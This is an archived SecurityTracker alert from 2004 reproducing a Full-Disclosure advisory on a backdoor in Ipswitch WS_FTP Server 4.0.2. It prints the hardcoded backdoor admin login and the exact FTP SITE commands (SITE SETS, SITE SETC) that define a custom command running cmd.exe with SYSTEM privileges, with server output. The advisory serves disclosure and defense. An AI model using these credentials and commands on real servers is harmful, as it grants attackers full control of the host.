SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
WS_FTP Server Backdoor Lets Local Users Execute Local Applications With SYSTEM Privileges
SecurityTracker Alert ID:  1009533
SecurityTracker URL:  http://securitytracker.com/id/1009533
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 23 2004
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): 4.0.2
Description:   A vulnerability was reported in WS_FTP Server. A local user can execute applications with SYSTEM privileges.

Hugh Mann reported that a local user can exploit a backdoor in the WS_FTP Server to cause the FTP server to execute local applications with SYSTEM privileges.

First, the local user can login with administrative privileges by using the following backdoor account via the local interface (127.0.0.1):

RealName: Local Session Manager
Username: XXSESS_MGRYY
Password: X#1833

Then, with FTP system administrator privileges, the local user can edit a user-defined FTP SITE command to execute a local application with SYSTEM privileges.

A remote authenticated user with system administrator privileges can also use the SITE SETS (Set Site Options) command to execute a local application with SYSTEM privileges, the report said.

Some demonstration exploit steps are presented in the Source Message.

Impact:   A local user can gain SYSTEM privileges on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/products/ws_ftp-server/index.html (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Open the WS_FTP Server backdoor to SYSTEM


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Advisory Name: Open the WS_FTP Server backdoor to SYSTEM
Impact       : Privilege escalation
Discovered by: Hugh Mann hughmann@hotmail.com
Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Description
~~~~~~~~~~~
Any local user or any remote user who can execute programs on the FTP server 
as any user can start programs on the FTP server with the SYSTEM privilege.

Details
~~~~~~~
There are two WS_FTP Server options only the FTP system administrator can 
change. When enabled a FTP system administrator can edit user-defined SITE 
FTP commands. These user-defined SITE commands execute a program of the FTP 
system admin's choice. To protect the FTP sites, these options can only be 
controlled by a local FTP system administrator using the iftpmgr.exe 
program. It's not possible for a remote FTP system admin to enable these 
options through the iftpmgr.exe program. However, it's possible for a FTP 
system administrator to enable these options with a special WS_FTP Server 
SITE command. Ipswitch forgot to mask out the bits that enable these options 
before saving the new Flags when it receives a new SITE SETS (Set Site 
Options) command from a remote FTP system administrator.

A "remote" FTP system admin is any FTP system admin using FTP/TELNET to 
connect to the server, which includes local users. If the remote user 
doesn't have the FTP system admin password but can run a program on the FTP 
server as any user, or if the user is a local user, the user can log in as 
the FTP system administrator by using a backdoor.

FTP System Administrator backdoor: Any local user, or any remote user who 
can run programs on the FTP server as any user, can log in as the FTP System 
Administrator by using a backdoor.

RealName: Local Session Manager
Username: XXSESS_MGRYY
Password: X#1833

The user must have an IP equal to 127.0.0.1 and must connect to server IP 
127.0.0.1 or the login will fail.

Exploit
~~~~~~~
Use telnet/ftp to log in as the FTP system admin or use the backdoor. Enable 
remote editing of SITE cmds/events (exec files). This is off by default, but 
can be enabled by a remote ftp admin. First use the SITE List Site Options 
command:

	SITE LSTC
	220 
C:\iFtpSvc<\t>C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>0<\t>1460<\t>0<\t>16384<\t>C:\iFtpSvc\Security<\t>0

<\t> means tab, or byte 0x09.

Write down the 2nd to 8th site options you find there. Change the 5th Flags 
option by OR'ing it with 0x180. Now put the 2nd to 8th options on the next 
line, each option separated by a tab, except for the first option right 
after "SITE SETS" which should have a space just before it:

	SITE SETS C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>384<\t>1460<\t>0<\t>16384
	220 options set

Now iftpmgr.exe can be used to remotely control all site options. I'll show 
how to manually add a SITE cmd we can use without using iftpmgr.exe. The 
command to do that is:

	SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
	220 site command modified

<HostName> is the first name displayed before you log in to the FTP. 3V1L is 
the name of the new SITE command. Flags = 16 means write output to the 
screen.

	SITE 3V1L
	200-Command Started
	200-yup
	200 SITE command execution successful

_________________________________________________________________
Find a broadband plan that fits. Great local deals on high-speed Internet 
access. http://click.atdmt.com/AVE/go/onm00200360ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC